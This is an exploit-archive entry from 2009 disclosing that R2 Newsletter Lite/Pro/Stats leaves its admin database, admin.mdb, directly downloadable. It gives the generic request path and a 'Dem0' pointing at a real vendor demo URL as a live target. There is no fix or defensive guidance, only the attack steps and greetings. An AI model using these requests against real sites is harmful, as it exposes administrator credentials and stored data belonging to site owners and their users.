[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : R2 Newsletter Lite/Pro/Stats (admin.mdb) Database Disclosure Vuln
# Published : 2009-06-01
# Author : TiGeR-Dz
# Previous Title : ecsportal rel 6.5 (article_view_photo.php id) SQL Injection Vulnerability
# Next Title : PAD Site Scripts 3.6 Remote Arbitrary Database Backup Vulnerability
---------------------------------------------------------------
---------------------------------------------------------------
R2 Newsletter Store (admin.mdb) Remote Admin Disclosure
Vulnerability
---------------------------------------------------------------
Founder : TiGeR-Dz
Home:http:/www.r2newsletter.com
Script:R2 Newsletter Store
Download:http://www.r2newsletter.com/shop/store/dynamicIndex.asp
---------------------------------------------------------------
Exploit:
-------
http://www.site.com/[script]/admin.asp
go to
http://www.site.com/[script]/admin.mdb
--------------------------------------
----------------------------------------------------------------
Dem0
----
http://www.r2newsletter.com/statsdemo/admin.asp
go to
http://www.r2newsletter.com/statsdemo/admin.mdb
--------------------------------------
Greeting To ALL My Friends (Dz)
# www.Syue.com [2009-06-01]